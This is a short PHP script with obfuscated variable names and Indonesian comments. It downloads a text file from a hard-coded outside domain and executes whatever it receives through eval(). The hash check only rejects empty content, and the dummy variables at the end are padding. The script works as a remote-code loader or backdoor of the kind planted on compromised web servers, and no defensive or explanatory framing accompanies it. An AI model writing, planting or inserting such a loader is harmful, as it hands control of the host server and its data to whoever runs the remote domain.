<?php

$__1 = "media.iloveto.cyou";
$__2 = "https://media.iloveto.cyou/4.txt";

function __3($__4) {
    global $__1;  // Menggunakan global untuk mengakses variabel $__1
    
    $__5 = parse_url($__4);
    
    if ($__5['host'] !== $__1) {
        die("Akses tidak diizinkan!");
    }

    $__6 = @file_get_contents($__4);

    if ($__6 === false) {
        die("Gagal memuat konten dari URL.");
    }

    try {
        $__7 = hash('sha256', $__6);
        if ($__7 !== 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855') {
            eval("?>$__6");
        } else {
            die("Konten tidak valid.");
        }
    } catch (Exception $__8) {
        echo "Terjadi kesalahan saat eksekusi: " . $__8->getMessage();
    }

    $__9 = "dummy_value";
    $__10 = "this_is_a_dummy";
    $__11 = $__9 . $__10;
}

__3($__2);

?>